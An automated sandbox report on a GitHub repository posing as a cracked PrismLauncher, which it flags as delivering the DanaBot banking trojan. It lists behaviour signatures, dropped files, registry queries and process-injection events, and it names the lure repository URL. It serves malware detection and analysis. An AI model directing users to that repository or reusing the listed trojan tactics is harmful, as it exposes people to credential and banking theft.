Malware Analysis Report

2025-05-05 21:44

Sample ID 250420-xtsbjassat
Target http://github.com/Diegiwg/PrismLauncher-Cracked
Tags
danabot banker discovery trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file http://github.com/Diegiwg/PrismLauncher-Cracked was found to be: Known bad.

Malicious Activity Summary

danabot banker discovery trojan

Danabot

Danabot family

Process spawned unexpected child process

Downloads MZ/PE file

Blocklisted process makes network request

Loads dropped DLL

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Drops file in Program Files directory

Browser Information Discovery

Program crash

System Location Discovery: System Language Discovery

Modifies data under HKEY_USERS

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies registry class

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Suspicious use of SetWindowsHookEx

Checks SCSI registry key(s)

Suspicious use of WriteProcessMemory

Checks processor information in registry

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-04-20 19:09

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-04-20 19:09

Reported

2025-04-20 19:19

Platform

win10v2004-20250314-en

Max time kernel

597s

Max time network

601s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://github.com/Diegiwg/PrismLauncher-Cracked

Signatures

Danabot

trojan banker danabot

Danabot family

danabot

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\DanaBot.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\Notification\notification.bundle.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\Notification\notification_fast.bundle.js.LICENSE.txt C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1827393022\hyph-sv.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-ec\ru\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-mobile-hub\sv\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\Wallet-Checkout\load-ec-i18n.bundle.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_536417775\_platform_specific\win_x64\widevinecdm.dll C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_951548711\LICENSE C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_96667937\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1827393022\hyph-da.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-mobile-hub\zh-Hant\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\wallet\wallet-checkout-eligible-sites.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\bnpl\bnpl.bundle.js.LICENSE.txt C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1825005940\keys.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1827393022\hyph-cy.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1827393022\hyph-fr.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1827393022\hyph-hr.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-ec\nl\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-hub\fr-CA\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-shared-components\ko\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1825005940\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-mobile-hub\zh-Hans\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-notification\ru\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-notification-shared\el\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\wallet\wallet-notification-config.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1827393022\hyph-tk.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-ec\id\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-hub\el\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-shared-components\cs\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1090327237\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\app-setup.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_536417775\_metadata\verified_contents.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1827393022\hyph-et.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1827393022\hyph-ru.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-ec\cs\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-mobile-hub\de\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-notification-shared\pt-BR\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1827393022\hyph-te.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\driver-signature.txt C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-ec\el\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-hub\nl\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-mobile-hub\ja\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1827393022\hyph-mul-ethi.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-notification\ko\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-notification-shared\ar\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\Wallet-BuyNow\wallet-buynow.html C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_780230892\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1827393022\hyph-el.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1827393022\hyph-eu.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1827393022\hyph-uk.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_833700207\Part-RU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-tokenized-card\id\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\wallet\wallet-checkout\checkoutdata.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\Notification\notification.html C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1476549494\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-hub\fi\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-notification\en-GB\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-notification\pt-PT\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-notification-shared\it\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\i18n-shared-components\ru\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\json\wallet\wallet-tokenization-config.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1182284200\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping5616_1827393022\hyph-bn.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Browser Information Discovery

discovery

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\DanaBot.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\DanaBot.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133896497873015393" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3342763580-2723508992-2885672917-1000\{B9CD01C3-958F-485E-A393-29681CD2EB1C} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5616 wrote to memory of 5560 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 5560 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 5792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 5792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5616 wrote to memory of 4592 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
